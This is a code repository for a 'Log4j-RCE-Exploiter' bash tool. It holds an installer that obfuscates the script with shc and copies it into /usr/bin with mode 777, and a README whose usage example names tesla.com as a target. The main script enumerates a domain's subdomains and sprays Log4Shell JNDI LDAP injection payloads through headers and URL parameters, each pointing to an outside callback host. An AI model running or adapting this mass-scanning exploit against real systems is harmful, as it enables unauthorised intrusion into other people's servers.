├── log4j.png ├── installer.sh ├── test.json ├── README.md └── .log4jExploiter.sh /log4j.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thecyberneh/Log4j-RCE-Exploiter/HEAD/log4j.png -------------------------------------------------------------------------------- /installer.sh: -------------------------------------------------------------------------------- 1 | shc -f .log4jExploiter.sh 2 | mv .log4jExploiter.sh.x log4jExploiter 3 | chmod 777 log4jExploiter 4 | cp log4jExploiter /usr/bin 5 | -------------------------------------------------------------------------------- /test.json: -------------------------------------------------------------------------------- 1 | { 2 | "url": "https://jumpy-floor.surge.sh/test.yaml", 3 | "urls": [ 4 | { 5 | "url": "https://jumpy-floor.surge.sh/test.yaml", 6 | "name": "Foo" 7 | } 8 | ] 9 | } 10 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Log4j-RCE-Exploiter 2 | Scanner for Log4j RCE CVE-2021-44228 3 | 4 | 5 | ![Log4j RCE Scanner Image](https://github.com/thecyberneh/Log4j-RCE-Exploiter/blob/main/log4j.png "Log4j Exploiter") 6 | 7 | # Installation 8 | For installation, Run the Following command with SUPERUSER (ROOT) 9 | ``` 10 | ▶ cd Log4j-RCE-Exploiter 11 | 12 | ▶ chmod 777 installer.sh 13 | 14 | ▶ ./installer.sh 15 | ``` 16 | 17 | # Usage 18 | 19 | ``` 20 | 21 | ▶ log4jExploiter -d tesla.com -b 6nuulng8dd2sivtd3kht31s9e0kq8f.burpcollaborator.net 22 | 23 | -h, --help Display help 24 | -l, --url-list List of domain/subdomain/ip to be used for scanning. 25 | -d, --domain The domain name to which all subdomains and itself will be checked. 26 | -b, --burpcollabid Burp collabrator client id address or interactsh domain address. 27 | 28 | ``` 29 | 30 | -------------------------------------------------------------------------------- /.log4jExploiter.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | by="\033[1;33m" 4 | bye="\033[1;00m" 5 | br="\033[1;31m" 6 | bre="\033[1;00m" 7 | blink="\e[5m" 8 | 9 | printf ""$by" 10 | 11 | ██╗ ██████╗ ██████╗ ██╗ ██╗ ██╗ ███████╗██╗ ██╗██████╗ ██╗ ██████╗ ██╗████████╗███████╗██████╗ 12 | ██║ ██╔═══██╗██╔════╝ ██║ ██║ ██║ ██╔════╝╚██╗██╔╝██╔══██╗██║ ██╔═══██╗██║╚══██╔══╝██╔════╝██╔══██╗ 13 | ██║ ██║ ██║██║ ███╗███████║ ██║ █████╗ ╚███╔╝ ██████╔╝██║ ██║ ██║██║ ██║ █████╗ ██████╔╝ 14 | ██║ ██║ ██║██║ ██║╚════██║██ ██║ ██╔══╝ ██╔██╗ ██╔═══╝ ██║ ██║ ██║██║ ██║ ██╔══╝ ██╔══██╗ 15 | ███████╗╚██████╔╝╚██████╔╝ ██║╚█████╔╝ ███████╗██╔╝ ██╗██║ ███████╗╚██████╔╝██║ ██║ ███████╗██║ ██║ 16 | ╚══════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚════╝ ╚══════╝╚═╝ ╚═╝╚═╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ 17 | 18 | 19 | 20 | "$bye"" 21 | 22 | 23 | printf ""$br" 24 | 25 | --------------------------- Written By ---------------------------- 26 | | Twitter :- https://twitter.com/thecyberneh | 27 | | Instagram :- https://www.instagram.com/thecyberneh/ | 28 | | Linkedin :- https://www.linkedin.com/in/thenehpatel/ | 29 | | | 30 | | Twitter :- https://twitter.com/imhardikrathod | 31 | | Instagram :- https://www.instagram.com/cyberknight60/ | 32 | | Linkedin :- https://www.linkedin.com/in/hardik-rathod1491/ | 33 | ------------------------------------------------------------------- 34 | 35 | 36 | "$bre"" 37 | 38 | showHelp() { 39 | cat << EOF 40 | $(tput setaf 2) 41 | Usage: 42 | $0 -l httpxsubdomains.txt -b yrt45r4sjyoj19617jem5briio3cs.burpcollaborator.net 43 | $0 -d adilsoybali.com -b yrt45r4sjyoj19617jem5briio3cs.burpcollaborator.net 44 | -h, --help Display help 45 | -l, --url-list List of domain/subdomain/ip to be used for scanning. 46 | -d, --domain The domain name to which all subdomains and itself will be checked. 47 | -b, --burpcollabid Burp collabrator client id address or interactsh domain address. 48 | $(tput sgr0) 49 | EOF 50 | } 51 | 52 | domainScan() { 53 | echo -e "\n$(tput setaf 2 ; tput rev ; tput bold) Subfinder is working $(tput sgr0)\n" ; subfinder -silent -d sub.$domain >> sub.$domain ; echo -e "\n$(tput setaf 2 ; tput rev ; tput bold) Assetfinder is working $(tput sgr0)\n" ; assetfinder -subs-only $domain >> sub.$domain ; echo -e "\n$(tput setaf 2 ; tput rev ; tput bold) Amass is working $(tput sgr0)\n" ; amass enum -norecursive --silent -noalts -d $domain >> sub.$domain ; cat sub.$domain | sort -u | httpx -silent | while read url; do 54 | echo 'curl -s --max-time 20 $url -H 'log4jPayload' > /dev/null' | sed "s|log4jPayload|'X-Api-Version: \${jndi:ldap://$burpcollabid/a}'|g" | sed "s|\$url|$url|g" | bash 55 | echo 'curl -s --max-time 20 '$url/?test=log4jPayload' > /dev/null' | sed "s|log4jPayload|'\$\\\{{jndi:ldap://$burpcollabid/a\\\}}'|g" | sed "s|\$url|$url|g" | bash 56 | echo 'curl -s --max-time 20 $url -H 'log4jPayload' > /dev/null' | sed "s|log4jPayload|'User-Agent: \${jndi:ldap://$burpcollabid/a}'|g" | sed "s|\$url|$url|g" | bash 57 | echo -e "\033[104m[ DOMAIN ==> $url ]\033[0m" "\n" "\033[92m Method 1 ==> X-Api-Version: running-Ldap-payload" "\n" " Method 2 ==> Useragent: running-Ldap-payload" "\n" " Method 3 ==> $url/?test=running-Ldap-payload" "\n\033[0m";done 58 | } 59 | 60 | listScan() { 61 | cat $list | sort -u | httpx -silent | gau | while read url; do 62 | echo 'curl -s --max-time 20 $url -H 'log4jPayload' > /dev/null' | sed "s|log4jPayload|'X-Api-Version: \${jndi:ldap://$burpcollabid/a}'|g" | sed "s|\$url|$url|g" | bash 63 | echo 'curl -s --max-time 20 '$url/?test=log4jPayload' > /dev/null' | sed "s|log4jPayload|'\$\\\{{jndi:ldap://$burpcollabid/a\\\}}'|g" | sed "s|\$url|$url|g" | bash 64 | echo 'curl -s --max-time 20 $url -H 'log4jPayload' > /dev/null' | sed "s|log4jPayload|'User-Agent: \${jndi:ldap://$burpcollabid/a}'|g" | sed "s|\$url|$url|g" | bash 65 | echo -e "\033[104m[ DOMAIN ==> $url ]\033[0m" "\n" "\033[92m Method 1 ==> X-Api-Version: running-Ldap-payload" "\n" " Method 2 ==> Useragent: running-Ldap-payload" "\n" " Method 3 ==> $url/?test=running-Ldap-payload" "\n\033[0m";done 66 | } 67 | 68 | while [[ "$1" =~ ^- && ! "$1" == "--" ]]; do case $1 in 69 | -l | --url-list ) 70 | list="$2" 71 | if [[ "$3" == "-b" || "$3" == "--burpcollabid" ]]; then 72 | burpcollabid="$4" 73 | else 74 | showHelp 75 | exit 76 | fi 77 | listScan 78 | exit 79 | ;; 80 | -d | --domain ) 81 | domain="$2" 82 | if [[ "$3" == "-b" || "$3" == "--burpcollabid" ]]; then 83 | burpcollabid="$4" 84 | else 85 | showHelp 86 | exit 87 | fi 88 | domainScan 89 | exit 90 | ;; 91 | *) 92 | showHelp 93 | exit 94 | ;; 95 | esac; shift; done 96 | if [[ "$1" == '--' ]]; then 97 | shift 98 | else 99 | showHelp 100 | exit 101 | fi 102 | --------------------------------------------------------------------------------